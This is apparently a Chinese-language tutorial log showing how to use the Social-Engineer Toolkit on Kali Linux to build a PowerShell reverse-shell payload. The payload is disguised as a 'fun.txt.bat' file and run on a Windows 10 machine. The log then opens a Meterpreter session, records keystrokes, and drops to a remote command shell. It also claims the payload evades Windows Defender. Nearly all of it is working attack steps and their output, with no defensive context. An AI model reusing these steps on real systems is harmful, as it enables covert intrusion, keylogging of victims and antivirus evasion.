使用工具 kali linux
[email protected]:~# setoolkit
Do you agree to the terms of service [y/n]: y
set> 1
set> 9
set:powershell>1
set> IP address for the payload listener (LHOST): 192.168.1.110 (kali linux的ip地址)
set:powershell> Enter the port for the reverse [443]:443
set> Do you want to start the listener now [yes/no]: : yes
新生成的病毒文件
msf exploit(handler) > ls -ll /root/.set/reports/powershell/
[*] exec: ls -ll /root/.set/reports/powershell/
total 12
-rw-r--r-- 1 root root 128 Mar 7 22:26 powershell.rc
-rw-r--r-- 1 root root 6773 Mar 7 22:26 x86_powershell_injection.txt
改名字x86_powershell_injection.txt 为fun.txt.bat
将fun.txt.bat文件传给win10,并运行
Kali上可以 看到以下
msf exploit(handler) > [*] Sending stage (957999 bytes) to 192.168.1.94
[*] Meterpreter session 1 opened (192.168.1.110:443 -> 192.168.1.94:50499) at 2017-03-07 22:46:45 -0500
回车
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 sh-270\slls @ SH-270 192.168.1.110:443 -> 192.168.1.94:50499 (192.168.1.94)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > help
meterpreter > keyscan_start
Starting the keystroke sniffer...
在win10中的输入,已经能被kali截取如下。
meterpreter > keyscan_dump
Dumping captured keystrokes...
这个病毒今天最新windows 10自带的defender检测不到。
meterpreter > shell
Process 9424 created.
Channel 1 created.
Microsoft Windows
(c) 2016 Microsoft Corporation
C:\Users\Desktop>dir (已经成功登陆)